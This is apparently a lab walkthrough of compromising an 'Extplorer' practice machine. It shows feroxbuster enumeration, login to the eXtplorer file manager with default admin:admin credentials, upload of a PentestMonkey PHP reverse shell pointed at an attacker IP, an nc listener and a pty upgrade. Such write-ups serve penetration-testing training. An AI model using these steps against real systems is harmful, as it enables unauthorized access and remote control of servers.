Http

Checking Page details

Found that page is using wordpress.

Looking for hidden directory.

feroxbuster --url http://$extplorer --filter-status 404

404      GET        9l       31w      276c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403      GET        9l       28w      279c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
302      GET        0l        0w        0c http://192.168.206.16/ => http://192.168.206.16/wp-admin/setup-config.php
301      GET        9l       28w      320c http://192.168.206.16/wordpress => http://192.168.206.16/wordpress/
301      GET        9l       28w      322c http://192.168.206.16/filemanager => http://192.168.206.16/filemanager/
301      GET        9l       28w      330c http://192.168.206.16/filemanager/include => http://192.168.206.16/filemanager/include/
301      GET        9l       28w      332c http://192.168.206.16/filemanager/languages => http://192.168.206.16/filemanager/languages/
301      GET        9l       28w      328c http://192.168.206.16/filemanager/style => http://192.168.206.16/filemanager/style/
301      GET        9l       28w      326c http://192.168.206.16/filemanager/sql => http://192.168.206.16/filemanager/sql/
200      GET       20l      104w      816c http://192.168.206.16/filemanager/sql/install.mysql.utf8.sql
301      GET        9l       28w      329c http://192.168.206.16/filemanager/images => http://192.168.206.16/filemanager/images/
301      GET        9l       28w      330c http://192.168.206.16/filemanager/scripts => http://192.168.206.16/filemanager/scripts/
301      GET        9l       28w      332c http://192.168.206.16/filemanager/libraries => http://192.168.206.16/filemanager/libraries/
301      GET        9l       28w      329c http://192.168.206.16/filemanager/config => http://192.168.206.16/filemanager/config/
200      GET      259l     1565w    11561c http://192.168.206.16/filemanager/copyright
301      GET        9l       28w      340c http://192.168.206.16/filemanager/libraries/Archive => http://192.168.206.16/filemanager/libraries/Archive/
301      GET        9l       28w      339c http://192.168.206.16/filemanager/images/extension => http://192.168.206.16/filemanager/images/extension/
301      GET        9l       28w      336c http://192.168.206.16/filemanager/libraries/FTP => http://192.168.206.16/filemanager/libraries/FTP/
301      GET        9l       28w      334c http://192.168.206.16/filemanager/scripts/yui => http://192.168.206.16/filemanager/scripts/yui/
301      GET        9l       28w      337c http://192.168.206.16/filemanager/libraries/Text => http://192.168.206.16/filemanager/libraries/Text/
200      GET        0l        0w        0c http://192.168.206.16/filemanager/libraries/Text/Diff.php
301      GET        9l       28w      337c http://192.168.206.16/filemanager/libraries/HTTP => http://192.168.206.16/filemanager/libraries/HTTP/
200      GET        1l        2w       17c http://192.168.206.16/filemanager/libraries/Text/TextEncoding.php
301      GET        9l       28w      345c http://192.168.206.16/filemanager/include/authentication => http://192.168.206.16/filemanager/include/authentication/
200      GET        1l        2w       17c http://192.168.206.16/filemanager/include/authentication/extplorer.php
200      GET        1l        2w       17c http://192.168.206.16/filemanager/include/authentication/ssh2.php
200      GET        1l        2w       17c http://192.168.206.16/filemanager/include/authentication/ftp.php
301      GET        9l       28w      340c http://192.168.206.16/filemanager/libraries/Console => http://192.168.206.16/filemanager/libraries/Console/
500      GET        0l        0w        0c http://192.168.206.16/filemanager/libraries/Auth/Auth.php
301      GET        9l       28w      337c http://192.168.206.16/filemanager/libraries/Auth => http://192.168.206.16/filemanager/libraries/Auth/
301      GET        9l       28w      338c http://192.168.206.16/filemanager/libraries/geshi => http://192.168.206.16/filemanager/libraries/geshi/

Found that there is one directory which is named as filemanager . On visiting this site reveals a login page.

http://192.168.206.16/filemanager/

Using password as admin:admin. We are able to login to the system.

This file manager has a PHP page. So, I will upload the php reverse shell code and get the reverse shell.

wget "https://www.revshells.com/PHP%20PentestMonkey?ip=192.168.45.231&port=80&shell=%2Fbin%2Fbash&encoding=%2Fbin%2Fbash" -O shell.php

Click on this icon to upload the file.

Click on save and you will see the upload successful message.

Start the listener at port 80.

sudo rlwrap -cAr nc -lnvp 80

As the page is in the home directory of the web directory we can access the page in below way.

curl http://$extplorer/shell.php

After running the above command you will get the shell.

Stablish the shell for tty shell.

(command -v python && python -c 'import pty; pty.spawn("/bin/bash");') || (command -v python3 && python3 -c 'import pty; pty.spawn("/bin/bash");')

PreviousExtplorer [Intermediate]NextPrivilege escalation

Last updated 1 year ago

Was this helpful?